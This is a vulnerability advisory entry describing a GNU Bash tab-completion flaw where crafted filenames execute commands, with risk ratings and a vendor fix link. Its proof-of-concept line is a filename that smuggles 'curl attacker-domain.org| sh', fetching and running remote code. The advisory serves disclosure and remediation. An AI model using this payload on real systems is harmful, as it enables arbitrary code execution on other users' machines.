Main Vulnerability Database Vulnerabilities #VU5653

#VU5653 Improper filename handling in Bash

Published: February 7, 2017

Vulnerability identifier: #VU5653

Vulnerability risk: Low

CVSSv4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/U:Clear

CVE-ID: N/A

CWE-ID: CWE-78

Exploitation vector: Local access

Exploit availability: No public exploit available

Vulnerable software:
Bash

Software vendor:
GNU

Description

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to incorrect handling of filenames, containing certain characters in GNU Bash. A local user can create a filename with double quote character followed by OS commands and execute them with privileges of the current user. The vulnerability is triggered automatically, once the victim starts typing the name of desired file and presses the Tab key to autocomplete the name of the file.

PoC-code:

	 some-very-long-string-nobody-is-going-to-type"`curl attacker-domain.org| sh`

Successful exploitation of the vulnerability may allow a local user with ability to place files on the filesystem to execute arbitrary OS commands with privileges of the current user.

Remediation

Install update from vendor’s GIT repository:

http://git.savannah.gnu.org/cgit/bash.git/commit/?id=4f747edc625815f449048579f6e65869914dd715

External links

https://github.com/jheyens/bash_completion_vuln/raw/master/2017-01-17.bash_completion_report.pdf